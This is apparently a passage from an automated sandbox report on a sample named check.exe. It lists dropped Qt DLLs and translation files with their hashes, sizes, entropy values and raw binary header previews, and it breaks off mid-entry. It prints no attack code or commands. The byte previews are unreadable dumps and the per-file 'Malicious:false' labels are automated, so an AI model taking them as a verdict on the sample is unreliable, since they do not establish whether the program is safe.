                                                                                                                                                                                                            SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):390128
                                                                                                                                                                                                            Entropy (8bit):5.724665470266677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                            MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                            SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                            SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                            SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30192
                                                                                                                                                                                                            Entropy (8bit):5.938644231596902
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                            MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                            SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                            SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                            SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):510448
                                                                                                                                                                                                            Entropy (8bit):6.605517748735854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                            MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                            SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                            SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                            SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):844784
                                                                                                                                                                                                            Entropy (8bit):6.625808732261156
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                            MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                            SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                            SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                            SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):754672
                                                                                                                                                                                                            Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                            MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                            SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                            SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                            SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):482288
                                                                                                                                                                                                            Entropy (8bit):6.152380961313931
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                            MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                            SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                            SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                            SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1477104
                                                                                                                                                                                                            Entropy (8bit):6.575113537540671
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                            MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                            SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                            SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                            SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68592
                                                                                                                                                                                                            Entropy (8bit):6.125954940500008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                            MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                            SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                            SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                            SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144368
                                                                                                                                                                                                            Entropy (8bit):6.294675868932723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                            MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                            SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                            SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                            SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):130
                                                                                                                                                                                                            Entropy (8bit):4.024232093209084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                            MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                            SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                            SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                            SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                            MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                            SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                            SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                            SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.631479835393124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                            MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                            SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                            SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                            SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                            MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                            SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                            SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                            SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                            MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                            SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                            SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                            SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                            MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                            SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                            SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                            SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                            MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                            SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                            SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                            SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):293121
                                                                                                                                                                                                            Entropy (8bit):5.272179385890926
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                            MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                            SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                            SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                            SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                            Entropy (8bit):3.739162292019161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                            MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                            SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
